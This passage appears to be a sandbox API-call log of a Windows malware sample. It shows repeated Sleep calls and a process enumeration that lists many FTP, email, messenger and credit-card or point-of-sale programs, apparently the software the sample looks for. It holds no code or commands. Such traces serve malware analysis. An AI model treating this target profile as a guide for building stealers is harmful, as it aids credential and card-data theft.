(dwMilliseconds=0x258) [0287.239] Sleep (dwMilliseconds=0x258) [0287.254] Sleep (dwMilliseconds=0x258) [0287.270] Sleep (dwMilliseconds=0x258) [0287.332] Sleep (dwMilliseconds=0x258) [0287.348] Sleep (dwMilliseconds=0x258) [0287.364] Sleep (dwMilliseconds=0x258) [0287.379] Sleep (dwMilliseconds=0x258) [0287.397] Sleep (dwMilliseconds=0x258) [0287.410] Sleep (dwMilliseconds=0x258) [0287.429] Sleep (dwMilliseconds=0x258) [0287.491] Sleep (dwMilliseconds=0x258) [0287.516] Sleep (dwMilliseconds=0x258) [0287.519] Sleep (dwMilliseconds=0x258) [0287.536] Sleep (dwMilliseconds=0x258) [0287.551] Sleep (dwMilliseconds=0x258) [0287.566] Sleep (dwMilliseconds=0x258) [0287.582] Sleep (dwMilliseconds=0x258) [0287.597] Sleep (dwMilliseconds=0x258) [0287.657] Sleep (dwMilliseconds=0x258) [0287.669] Sleep (dwMilliseconds=0x258) [0287.675] Sleep (dwMilliseconds=0x258) [0287.691] Sleep (dwMilliseconds=0x258) [0287.706] Sleep (dwMilliseconds=0x258) [0287.722] Sleep (dwMilliseconds=0x258) [0287.738] Sleep (dwMilliseconds=0x258) [0287.774] Sleep (dwMilliseconds=0x258) [0287.816] Sleep (dwMilliseconds=0x258) [0287.832] Sleep (dwMilliseconds=0x258) [0287.847] Sleep (dwMilliseconds=0x258) [0287.863] Sleep (dwMilliseconds=0x258) [0287.879] Sleep (dwMilliseconds=0x258) [0287.894] Sleep (dwMilliseconds=0x258) [0287.909] Sleep (dwMilliseconds=0x258) [0288.150] Sleep (dwMilliseconds=0x258) [0288.315] Sleep (dwMilliseconds=0x258) [0288.332] Sleep (dwMilliseconds=0x258) [0288.346] Sleep (dwMilliseconds=0x258) Thread: id = 40 os_tid = 0xea4 [0096.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1500 [0096.307] Process32First (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.310] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.313] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.316] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.318] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.321] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.324] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.327] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.330] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.333] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.335] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.339] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.342] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.345] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.348] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.350] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.353] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.355] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.358] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.361] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.363] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.365] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.367] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.369] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.371] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.373] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.375] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.377] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.379] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.381] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rule_night.exe")) returned 1 [0096.384] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="lawyercheckpractice.exe")) returned 1 [0096.385] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="move.exe")) returned 1 [0096.387] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="propertystep.exe")) returned 1 [0096.392] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0096.393] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="deep.exe")) returned 1 [0096.395] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="candidate-coach.exe")) returned 1 [0096.396] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="central rule.exe")) returned 1 [0096.398] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="stage.exe")) returned 1 [0096.400] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="which.exe")) returned 1 [0096.402] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="could team.exe")) returned 1 [0096.404] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="special avoid share.exe")) returned 1 [0096.405] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="collection.exe")) returned 1 [0096.410] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="none.exe")) returned 1 [0096.412] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="perform.exe")) returned 1 [0096.413] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.415] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.417] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.419] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.422] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.424] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.426] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.429] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.432] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.434] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.437] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.439] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.442] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.444] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.446] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.449] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.453] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.455] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.457] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.459] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.463] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.467] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.471] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.475] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.479] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.484] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.488] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.492] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.495] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.501] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.505] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.508] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.512] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.516] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, 